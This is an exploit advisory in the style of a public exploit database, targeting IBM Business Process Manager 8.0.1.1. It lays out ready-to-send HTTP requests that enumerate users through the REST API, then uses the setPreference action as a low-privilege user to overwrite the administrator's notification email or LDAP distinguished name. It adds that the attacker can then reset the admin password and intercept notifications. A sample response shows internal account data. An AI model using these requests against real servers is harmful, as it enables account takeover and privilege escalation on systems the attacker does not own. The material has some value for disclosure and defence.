Exploit Title: IBM BMPS (BPM) User account reconfiguration/Privilege Escalation/Information Disclosure
Date: 31.01.14
Exploit Author: 0in
Software link: http://www-03.ibm.com/software/products/en/business-process-manager-family/
Version: 8.0.1.1 (newest versions can also be vulnerable)

Vulnerability Description:
Its possible to change some specfic values in accounts database (in my case it was LDAP) by authenticated but not privileged user, invoking setPreference action

------------------------------------------------------------------------------------
First of all, we should enumerate existing users to find administrator account.
We should proceed following request:

GET /rest/bpm/wle/v1/users?filter=*admin*&maxresult=11&assignTaskidFilter=[INT TASK ID]&namesonly=false&parts=all HTTP/1.1
x-requested-with: XMLHttpRequest

In result of this request we can get response like this:
{"status":"200","data":{"users":[{"userID":1,"userName":"admin","fullName":"Administrator BPMS","isDisabled":false,"primaryGroup":null,"emailAddress":"admin@corpo","userPreferences":{ "Portal Default Page":"/dashboards?dashboard=%2Fteamworks%2FexecuteServiceByName%3FprocessApp%3DSCIM%26serviceName%History%2Bprocess%25C3%25B3w%26snapshot%3D4.0.0%26zResumable%3Dtrue", "Task Email Address":"admin@corpo","Task Notification":"true","LDAPDistinguishedName":"CN=bpmsadmin,OU=confidential,OU=Users,OU=RU,DC= confidential,DC= confidential,DC=corp,DC= confidential ","Locale":"ru","Alert On Assign And Run":"true"},"tasksCollaboration":null,"memberships":["Debug","admins","authors","portal_admins","process_owners","allusers","All Users_S_da7e4d23-78cb-4483-*******",[]

Ok, so now we have administrator username, in next step we should set his email or LDAPDistinguishedName to our, to invoke this, we should generate url like this:

PUT /rest/bpm/wle/v1/user/admin?action=setPreference&key=Task%20Email%20Address&value=AttackerEmail@corpo HTTP/1.1
x-requested-with: XMLHttpRequest

Or just set LDAP preferences to our:
PUT /rest/bpm/wle/v1/user/admin?action=setPreference&key=LDAPDistinguishedName&value= CN=ATTACKER_LOGIN,OU=w00tw00t,OU=Users,OU=Group,DC=my,DC=sub,DC=domain,DC=corpo HTTP/1.1


Now attacker can receive all notifications about victim processes in his email, attacker can change victim password using forgotten password option, change victim portal default page, LDAP Attributes. We have lot of other possibilities to exploit this situation it depends of BPMS service context.